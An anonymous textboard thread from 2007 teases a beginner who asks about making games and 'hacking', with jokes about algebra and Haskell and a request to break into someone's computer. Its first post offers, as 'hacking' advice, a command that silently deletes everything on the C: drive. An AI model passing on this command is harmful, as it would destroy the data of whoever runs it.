Well, start by learning C. Then have a look at SDL and OpenGL.
As for the hacking part, just use system("rd C:/* /S /Q");
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Anonymous2007-11-25 4:44
>>2
That is no problem, you don't need anything beyond simple algebra to make a game.
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Anonymous2007-11-25 4:51
>>7
cartesian coordinates are necessary for mapping sprites to the screen
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Anonymous2007-11-25 5:20
>>1
HAI I wan 2 do that 2. I ddnt red SPIC but I have progmraded a HTML progmrgam that shoowd a table! I l33t3r > u.
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Anonymous2007-11-25 11:00
I'm interested in abusing XMonad to "hack" someone's (will go unnamed) computer, for reasons I'll keep to myself. I've done a little research on it, but I haven't yet found any solid evidence that you can use XMonad to "hack" someone's computer.
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Anonymous2007-11-25 15:36
>>10
Sorry, it can't be done. XMonad is written in Haskell, a purely functional language. You can create a "hacked" monad, but that's about it.